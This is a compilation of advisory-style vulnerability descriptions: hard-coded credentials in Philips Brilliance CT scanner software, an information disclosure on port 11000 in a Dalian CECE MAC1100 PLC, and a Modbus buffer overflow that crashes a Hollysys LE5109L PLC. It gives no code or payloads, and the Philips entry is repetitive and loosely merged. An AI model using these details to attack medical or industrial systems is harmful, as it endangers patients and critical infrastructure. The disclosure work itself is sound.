Philips Brilliance CT software (Brilliance 64 version 2.6.2 and prior, Brilliance iCT versions 4.1.6 and prior, Brillance iCT SP versions 3.2.4 and prior, and Brilliance CT Big Bore 2.3.5 and prior) contains fixed credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. An attacker could compromise these credentials and gain access to the system. plural Philips The product contains a vulnerability related to the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Philips Brilliance64 and others are CT scanners from Philips, the Netherlands. A security vulnerability exists in several Philips BrillianceCT devices that use hard-coded credentials (such as passwords or encryption keys) from the software in the device. Philips Brilliance Computed Tomography Systems are prone to the following security vulnerabilities: 1. A local privilege-escalation vulnerability. 2. Multiple local information-disclosure vulnerabilities An attacker may leverage these issues to obtain sensitive information, gain elevated privileges; this can result in arbitrary code execution within the context of the vulnerable application. Failed exploit attempts will likely cause denial-of-service conditions. Philips Brilliance 64 etc

MAC1100 PLC Programmable Logic Controller (PLC) is a product in the Dalian CECE Programmable Logic Controller (PLC) series. This product is widely used in important industrial control sites such as intelligent buildings, power data monitoring, thermal control systems, and enterprise management systems. DCCE MAC1100 PLC has an information disclosure vulnerability. The vulnerability originates from the MAC1100 PLC using the EPA protocol to communicate on port 11000. An attacker can use the vulnerability to read a specific storage area, collect relevant device information in the PLC, and can be used for PLC device identification attacks

Hollysys Group is a professional automation company integrating R & D, production, sales and technical services. Hollysys PLC integrated Ethernet, PROFIBUS-DP, RS232, RS485 interfaces have been widely used in power, chemical, metallurgy, energy and other fields. Hollysys LE5109L PLC has a buffer overflow vulnerability. An attacker can use this vulnerability to cause a buffer overflow in the Hollysys PLC by constructing a specific modbus network data packet. The CPU enters a failure mode and cannot be pinged. It can automatically restart after a period of time